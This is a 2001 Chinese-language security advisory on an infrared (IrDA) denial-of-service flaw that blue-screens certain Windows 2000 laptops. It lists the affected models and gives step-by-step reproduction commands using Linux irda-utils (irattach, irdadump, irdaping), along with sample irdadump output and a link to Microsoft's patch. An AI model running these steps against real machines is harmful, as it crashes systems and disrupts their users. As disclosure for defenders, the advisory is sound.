部分笔记本电脑存在IRDA拒绝服务攻击

发布时间：2001-08-24
更新时间：2001-08-24
严重程度：中
威胁程度：远程拒绝服务
错误类型：设计错误
利用方式：服务器模式

受影响系统

[] OEM laptop, Windows 2000 Professional service pack 2 v5.00.2195,
     National Semiconductor IrDA.
     Options:
        Infrared Trans. A: HP HSDL-1100/2100,
        Infrared Trans. B SIR Transceiver,
        Max Con. Rate: 4Mbps.
     Driver National Semiconductor 9/8/1999 v1.0.0.0 (signed MS 2000
     Publisher)

  [] Toshiba Satellite Pro 4000, Windows 2000 Professional service pack 2
     v5.00.2195, SMC IrCC IrDA.
     Options:
        Fast Infrared Port: Infrared
        Transceiver Type: auto,
        Min. Turn-Around Time: 1.0mS,
        Speed Limit: 4 Mbps,
     Driver: SMC 22/10/2000 v4.10.1999.5 (signed MS comp).

  [] Acer TravelMate 527TE P3-700MHz, Windows 2000 Professional

详细描述
windows机器可以被通过红外线端口产生拒绝服务攻击，出现BSOD蓝屏现象，并需要重新启动，IRDA端口在多数笔记本电脑中出现，下面的测试针对Windows 2000 Professional 版本，而在WINDOWS98上没有这种现象。

测试代码
1）启动笔记本，目标机器运行WINDOWS，攻击者运行GNU/LINUX，
LINUX需要有IRDA支持。
2）在GNU/LINUX下，安装好irda-utils-0.9.10-9 。
3）使用"irattach /dev/ttyS1 -s" 命令激活IRDA端口。
4）使用"irdadump"命令检查GNU/LINUX是否工作正确：

07:28:17.790903 xid:cmd 4d274896 > ffffffff S=6 s=0 (14)
07:28:17.880849 xid:cmd 4d274896 > ffffffff S=6 s=1 (14)
07:28:17.970845 xid:cmd 4d274896 > ffffffff S=6 s=2 (14)
07:28:18.060858 xid:cmd 4d274896 > ffffffff S=6 s=3 (14)
07:28:18.150840 xid:cmd 4d274896 > ffffffff S=6 s=4 (14)
07:28:18.240861 xid:cmd 4d274896 > ffffffff S=6 s=5 (14)
07:28:18.330859 xid:cmd 4d274896 > ffffffff S=6 s=* rattusrattus hint=0400 [ Computer ] (28)

5）放置好笔记本，红外线端口对齐，这样"irdadump"可以影响笔记本，
WINDOWS得到响应。
6）运行irdaping，目的地址如上"0x4d274896" 。
7）目标机器可能出现BSOD蓝屏现象。

解决方案
微软已经推出补丁程序：

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS01-046.asp

相关信息
paulm at astro.gla.ac.uk

最近严重漏洞

部分笔记本电脑存在IRDA拒绝服务攻击